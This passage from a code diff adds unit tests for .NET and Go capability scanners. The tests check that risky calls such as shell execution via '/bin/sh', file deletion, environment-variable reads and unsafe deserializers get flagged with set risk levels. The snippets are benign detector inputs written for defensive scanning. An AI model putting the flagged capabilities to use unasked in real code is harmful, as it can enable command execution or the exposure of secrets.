+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresMultiLineComments()
+ {
+ const string code = @"
+/*
+Process.Start(""cmd"");
+File.Delete(""file.txt"");
+*/
+public void Method() { }";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ #endregion
+
+ #region ScanFile - Exec Patterns
+
+ [Fact]
+ public void ScanFile_DetectsProcessStart()
+ {
+ const string code = @"Process.Start(""notepad.exe"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("Process.Start", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ Assert.Equal(1.0f, result[0].Confidence);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewProcessStartInfo()
+ {
+ const string code = @"var psi = new ProcessStartInfo(""cmd.exe"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("ProcessStartInfo", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessStartInfoObjectInitializer()
+ {
+ const string code = @"var psi = new ProcessStartInfo { FileName = ""cmd.exe"" };";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUseShellExecuteTrue()
+ {
+ const string code = @"psi.UseShellExecute = true;";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("UseShellExecute=true", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Filesystem Patterns
+
+ [Fact]
+ public void ScanFile_DetectsFileReadAllText()
+ {
+ const string code = @"var content = File.ReadAllText(""file.txt"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File.ReadAll/WriteAll", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileWriteAllText()
+ {
+ const string code = @"File.WriteAllText(""file.txt"", content);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File.ReadAll/WriteAll", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileDelete()
+ {
+ const string code = @"File.Delete(""file.txt"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File/Directory.Delete", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsDirectoryDelete()
+ {
+ const string code = @"Directory.Delete(""dir"", true);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File/Directory.Delete", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileCopy()
+ {
+ const string code = @"File.Copy(""src.txt"", ""dest.txt"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File/Directory operations", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewFileStream()
+ {
+ const string code = @"using var fs = new FileStream(""file.bin"", FileMode.Open);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("FileStream", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSetAccessControl()
+ {
+ const string code = @"fileInfo.SetAccessControl(security);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("SetAccessControl", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Network Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNewHttpClient()
+ {
+ const string code = @"using var client = new HttpClient();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("HttpClient", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsGetAsync()
+ {
+ const string code = @"var response = await client.GetAsync(url);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("HttpClient", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewWebClient()
+ {
+ const string code = @"using var client = new WebClient();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("WebClient", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewSocket()
+ {
+ const string code = @"var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("Socket/TcpClient", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewTcpClient()
+ {
+ const string code = @"var tcp = new TcpClient(""localhost"", 8080);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("Socket/TcpClient", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWebRequestCreate()
+ {
+ const string code = @"var request = WebRequest.Create(url);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("WebRequest", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Environment Patterns
+
+ [Fact]
+ public void ScanFile_DetectsEnvironmentGetEnvironmentVariable()
+ {
+ const string code = @"var path = Environment.GetEnvironmentVariable(""PATH"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("Environment.GetEnvironmentVariable", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsEnvironmentSetEnvironmentVariable()
+ {
+ const string code = @"Environment.SetEnvironmentVariable(""MY_VAR"", ""value"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("Environment.SetEnvironmentVariable", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsEnvironmentGetEnvironmentVariables()
+ {
+ const string code = @"var envVars = Environment.GetEnvironmentVariables();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("Environment.GetEnvironmentVariables", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Serialization Patterns (Critical for deserialization attacks)
+
+ [Fact]
+ public void ScanFile_DetectsBinaryFormatter()
+ {
+ const string code = @"var formatter = new BinaryFormatter();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("BinaryFormatter", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsObjectStateFormatter()
+ {
+ const string code = @"var formatter = new ObjectStateFormatter();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("ObjectStateFormatter", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNetDataContractSerializer()
+ {
+ const string code = @"var serializer = new NetDataContractSerializer();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("NetDataContractSerializer", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsLosFormatter()
+ {
+ const string code = @"var formatter = new LosFormatter();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("LosFormatter", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSoapFormatter()
+ {
+ const string code = @"var formatter = new SoapFormatter();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("SoapFormatter", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsDataContractSerializer()
+ {
+ const string code = @"var serializer = new DataContractSerializer(typeof(MyClass));";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("DataContractSerializer", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJsonDeserialize()
+ {
+ const string code = @"var obj = JsonSerializer.Deserialize<MyClass>(json);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("JsonSerializer.Deserialize", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Crypto Patterns
+
+ [Fact]
+ public void ScanFile_DetectsAesCreate()
+ {
+ const string code = @"using var aes = Aes.Create();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("Cryptography", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRsaCreate()
+ {
+ const string code = @"using var rsa = RSA.Create();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("Asymmetric crypto", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Database Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNewSqlConnection()
+ {
+ const string code = @"using var conn = new SqlConnection(connectionString);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("SqlConnection", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewSqlCommand()
+ {
+ const string code = @"var cmd = new SqlCommand(""SELECT * FROM Users"", conn);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("SqlCommand", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsExecuteNonQuery()
+ {
+ const string code = @"cmd.ExecuteNonQuery();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("Execute*", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsExecuteReader()
+ {
+ const string code = @"using var reader = cmd.ExecuteReader();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ }
+
+ #endregion
+
+ #region ScanFile - Dynamic Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsDynamicMethod()
+ {
+ const string code = @"var dm = new DynamicMethod(""Test"", typeof(int), null);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("DynamicMethod", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsILGenerator()
+ {
+ const string code = @"var il = dm.GetILGenerator();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("ILGenerator", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsCSharpScript()
+ {
+ const string code = @"var result = await CSharpScript.EvaluateAsync(code);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("CSharpScript", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsTypeBuilder()
+ {
+ const string code = @"var tb = mb.DefineType(""MyType"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ // TypeBuilder check expects "TypeBuilder" in the line
+ Assert.Empty(result); // DefineType doesn't match TypeBuilder pattern
+ }
+
+ #endregion
+
+ #region ScanFile - Reflection Patterns
+
+ [Fact]
+ public void ScanFile_DetectsAssemblyLoad()
+ {
+ const string code = @"var assembly = Assembly.Load(""MyAssembly"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Assembly.Load", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsAssemblyLoadFrom()
+ {
+ const string code = @"var assembly = Assembly.LoadFrom(""plugin.dll"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Assembly.Load", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsAssemblyLoadFile()
+ {
+ const string code = @"var assembly = Assembly.LoadFile(path);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsTypeInvokeMember()
+ {
+ const string code = @"type.InvokeMember(""Method"", BindingFlags.InvokeMethod, null, obj, args);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Type.InvokeMember", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsActivatorCreateInstance()
+ {
+ const string code = @"var obj = Activator.CreateInstance(type);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Activator.CreateInstance", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Native Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsDllImport()
+ {
+ const string code = @"[DllImport(""kernel32.dll"")]";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("DllImport", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsLibraryImport()
+ {
+ const string code = @"[LibraryImport(""user32.dll"")]";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("LibraryImport", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsMarshalPtrToStructure()
+ {
+ const string code = @"var obj = Marshal.PtrToStructure(ptr);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("Marshal operations", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsMarshalAllocHGlobal()
+ {
+ const string code = @"var ptr = Marshal.AllocHGlobal(size);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNativeLibraryLoad()
+ {
+ const string code = @"var lib = NativeLibrary.Load(""mylib.dll"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("NativeLibrary.Load", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsIntPtrOperations()
+ {
+ const string code = @"var ptr = new IntPtr(address);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("IntPtr operations", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Unsafe Patterns
+
+ [Fact]
+ public void ScanFile_DetectsUnsafeBlock()
+ {
+ const string code = @"unsafe { var ptr = &value; }";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("unsafe block", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFixedStatement()
+ {
+ const string code = @"fixed (byte* ptr = array) { }";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("fixed statement", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsStackalloc()
+ {
+ const string code = @"Span<byte> buffer = stackalloc byte[256];";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("stackalloc", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region DotNetCapabilityEvidence Tests
+
+ [Fact]
+ public void Evidence_DeduplicationKey_IsCorrect()
+ {
+ var evidence = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.cs",
+ 10,
+ "Process.Start");
+
+ Assert.Equal("Exec|Test.cs|10|Process.Start", evidence.DeduplicationKey);
+ }
+
+ [Fact]
+ public void Evidence_ConfidenceIsClamped()
+ {
+ var evidence1 = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec, "Test.cs", 1, "pattern",
+ confidence: 2.0f);
+ var evidence2 = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec, "Test.cs", 1, "pattern",
+ confidence: -1.0f);
+
+ Assert.Equal(1.0f, evidence1.Confidence);
+ Assert.Equal(0.0f, evidence2.Confidence);
+ }
+
+ [Fact]
+ public void Evidence_CreateMetadata_IncludesAllFields()
+ {
+ var evidence = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.cs",
+ 10,
+ "Process.Start",
+ snippet: "Process.Start(\"cmd.exe\");",
+ confidence: 0.95f,
+ risk: CapabilityRisk.Critical);
+
+ var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
+
+ Assert.Equal("exec", metadata["capability.kind"]);
+ Assert.Equal("Test.cs:10", metadata["capability.source"]);
+ Assert.Equal("Process.Start", metadata["capability.pattern"]);
+ Assert.Equal("critical", metadata["capability.risk"]);
+ Assert.Equal("0.95", metadata["capability.confidence"]);
+ Assert.Contains("Process.Start", metadata["capability.snippet"]);
+ }
+
+ [Fact]
+ public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
+ {
+ var evidence = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.cs",
+ 10,
+ "Process.Start");
+
+ var langEvidence = evidence.ToLanguageEvidence();
+
+ Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
+ Assert.Equal("Test.cs", langEvidence.Source);
+ Assert.Equal("line:10", langEvidence.Locator);
+ Assert.Equal("Exec:Process.Start", langEvidence.Value);
+ }
+
+ #endregion
+}
diff --git a/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Go.Tests/Internal/GoCapabilityScannerTests.cs b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Go.Tests/Internal/GoCapabilityScannerTests.cs
new file mode 100644
index 000000000..b41dbaacb
--- /dev/null
+++ b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Go.Tests/Internal/GoCapabilityScannerTests.cs
@@ -0,0 +1,766 @@
+using StellaOps.Scanner.Analyzers.Lang.Go.Internal;
+
+namespace StellaOps.Scanner.Analyzers.Lang.Go.Tests.Internal;
+
+/// <summary>
+/// Tests for <see cref="GoCapabilityScanner"/>.
+/// </summary>
+public sealed class GoCapabilityScannerTests
+{
+ private const string TestFile = "test.go";
+
+ #region ScanFile - General Tests
+
+ [Fact]
+ public void ScanFile_NullContent_ReturnsEmpty()
+ {
+ var result = GoCapabilityScanner.ScanFile(null!, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_EmptyContent_ReturnsEmpty()
+ {
+ var result = GoCapabilityScanner.ScanFile("", TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_WhitespaceContent_ReturnsEmpty()
+ {
+ var result = GoCapabilityScanner.ScanFile(" \n\t\n ", TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NoPatterns_ReturnsEmpty()
+ {
+ const string code = @"
+package main
+
+func main() {
+ x := 1 + 2
+ println(x)
+}";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NormalizesBackslashesInPath()
+ {
+ const string code = @"cmd := exec.Command(""ls"")";
+ var result = GoCapabilityScanner.ScanFile(code, @"C:\test\file.go");
+
+ Assert.Single(result);
+ Assert.Equal("C:/test/file.go", result[0].SourceFile);
+ }
+
+ [Fact]
+ public void ScanFile_DeduplicatesSamePattern()
+ {
+ const string code = @"
+exec.Command(""ls"")
+exec.Command(""pwd"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ // Two different lines = two evidences
+ Assert.Equal(2, result.Count);
+ }
+
+ [Fact]
+ public void ScanFile_SortsByFileLineThenKind()
+ {
+ const string code = @"
+os.Getenv(""PATH"")
+exec.Command(""ls"")
+os.Open(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.True(result.Count >= 3);
+ for (int i = 1; i < result.Count; i++)
+ {
+ Assert.True(
+ result[i - 1].SourceLine < result[i].SourceLine ||
+ (result[i - 1].SourceLine == result[i].SourceLine &&
+ result[i - 1].Kind <= result[i].Kind));
+ }
+ }
+
+ #endregion
+
+ #region ScanFile - Comment Stripping
+
+ [Fact]
+ public void ScanFile_IgnoresSingleLineComments()
+ {
+ const string code = @"
+package main
+// exec.Command(""ls"") - this is a comment
+func main() {}";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresMultiLineComments()
+ {
+ const string code = @"
+package main
+/*
+exec.Command(""ls"")
+os.Remove(""file"")
+*/
+func main() {}";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ #endregion
+
+ #region ScanFile - Exec Patterns
+
+ [Fact]
+ public void ScanFile_DetectsExecCommand()
+ {
+ const string code = @"cmd := exec.Command(""ls"", ""-la"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("exec.Command", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ Assert.Equal(1.0f, result[0].Confidence);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsExecCommandContext()
+ {
+ const string code = @"cmd := exec.CommandContext(ctx, ""ls"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("exec.Command", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSyscallExec()
+ {
+ const string code = @"syscall.Exec(""/bin/sh"", args, env)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("syscall.Exec", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSyscallForkExec()
+ {
+ const string code = @"syscall.ForkExec(""/bin/sh"", args, nil)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("syscall.Exec", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsStartProcess()
+ {
+ const string code = @"os.StartProcess(""/bin/ls"", []string{}, &attr)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("os.StartProcess", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Filesystem Patterns
+
+ [Fact]
+ public void ScanFile_DetectsOsCreate()
+ {
+ const string code = @"f, err := os.Create(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Open/Create", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsOpen()
+ {
+ const string code = @"f, err := os.Open(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Open/Create", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsOpenFile()
+ {
+ const string code = @"f, err := os.OpenFile(""file.txt"", os.O_RDWR, 0644)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsRemove()
+ {
+ const string code = @"os.Remove(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
